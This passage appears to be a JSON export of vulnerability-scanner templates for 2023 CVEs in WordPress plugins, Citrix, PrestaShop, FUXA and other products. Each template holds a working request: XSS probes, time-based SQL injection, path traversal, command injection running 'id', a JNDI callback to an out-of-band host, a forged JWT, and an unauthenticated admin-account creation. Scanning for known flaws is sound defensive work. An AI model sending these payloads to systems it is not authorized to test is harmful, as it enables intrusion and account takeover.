Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert(document.domain)> appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"><script>alert(document.domain)</script>\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4966","info":{"name":"Citrix Bleed - Leaking Session Tokens","severity":"high"},"requests":[{"raw":["GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\n{{str}}: {{Hostname}}\nHost: {{payload}}\n\n","POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1\nHost: {{Hostname}}\nCookie: NSC_AAAC={{session}}\n\n"],"unsafe":true,"extractors":[{"type":"regex","name":"session","part":"body_1","group":1,"regex":["([a-f0-9]{100}45525d5f4f58455e445a4a42)"],"internal":true},{"type":"regex","part":"body_2","regex":["([a-z0-9._]+)"]}],"matchers-condition":"and","matchers":[{"type":"word","words":["NSC_AAAC=","HTTP/1.1"]},{"type":"word","words":["{\"issuer\":"]}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named <img src=\\\"\\\" onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"<script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><audio src=x onerror=confirm(document.domain)>\""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["name=\"nonce_wdseo\" value=\"([a-z0-9]+)\" \\/>"],"internal":true}]}]},{"id":"CVE-2023-5074","info":{"name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dview8/api/usersByLevel HTTP/1.1\nHost: {{Hostname}}\nAuthorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-4148","info":{"name":"Ditty < 3.1.25 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(/XSS/)</script>\") && contains(body_2, \"ditty\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-47211","info":{"name":"ManageEngine OpManager - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /two_factor_auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains(body, \"MIBFile with same name already exists\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"x_zcsrf_token","group":1,"part":"header","regex":["Set-Cookie: opmcsrfcookie=([^;]{50,})"],"internal":true}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-3843","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.domain)>w71ch\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-26347","info":{"name":"Adobe Coldfusion - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wddxPacket version=","<string>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34754","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatus=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains_all(body_2, \"Active</option>\", \"Inactive</option>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36347","info":{"name":"POS Codekop v2.0 - Broken Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/excel.php","{{BaseURL}}/pos-kasir-php/excel.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Document"]},{"type":"word","part":"header","words":["application/vnd.ms-excel"]}]}]},{"id":"CVE-2023-27847","info":{"name":"PrestaShop xipblog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(tolower(response), \"prestashop\", \"xipblog\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"word","name":"union-based","part":"body_1","words":["{{md5({{num}})}}"]},{"type":"dsl","name":"time-based","dsl":["duration_2>=6"]}]}]},{"id":"CVE-2023-25194","info":{"name":"Apache Druid Kafka Connect - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"rmi://{{interactsh-url}}:6666/test\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["RecordSupplier"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-39700","info":{"name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><img src=x onerror=confirm(document.cookie)>\") && contains(body, \"IceWarp\")"],"condition":"and"}]}]},{"id":"CVE-2023-30625","info":{"name":"Rudder Server < 1.3.0-rc.1  - SQL Injection","severity":"high"},"requests":[{"raw":["POST /v1/warehouse/pending-events HTTP/1.1\nHost: {{Hostname}}\n\n{\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["error getting pending"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-29439","info":{"name":"FooGallery plugin <= 2.2.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-gallery_id=\"\\\"><script>alert(document.domain)</script>\"","foogallery-image-edit-modal"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33831","info":{"name":"FUXA - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/runscript HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"headers\": {\"normalizedNames\": {}, \"lazyUpdate\": \"null\"}, \"params\": {\"script\": {\"parameters\": [{\"name\": \"ok\", \"type\": \"tagid\", \"value\": \"\"}], \"mode\": \"\", \"id\": \"\", \"test\": \"true\", \"name\": \"ok\", \"outputId\": \"\", \"code\": \"require('child_process').exec('id > ./_images/{{filename}}')\"}}}\n","GET /_images/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Script OK:"]},{"type":"word","part":"body_2","words":["uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35161","info":{"name":"XWiki >= 6.2-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","DeleteApplication","data-xwiki"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-35156","info":{"name":"XWiki >= 6.0-rc-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cancel\" href=\"javascript:alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-34993","info":{"name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-35813","info":{"name":"Sitecore - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{{url_encode(payload)}}\")\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, '{{string}}')","contains_all(body, 'commands', 'command', 'value')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39650","info":{"name":"PrestaShop Theme Volty CMS Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5484--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5485--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=5","status_code_1 == 200 && contains(body_1, \"tvcmsblog\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_2 == 200 && contains(body_2, \"tvcmsblog\")","status_code_2 == 200 && status_code_3 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a 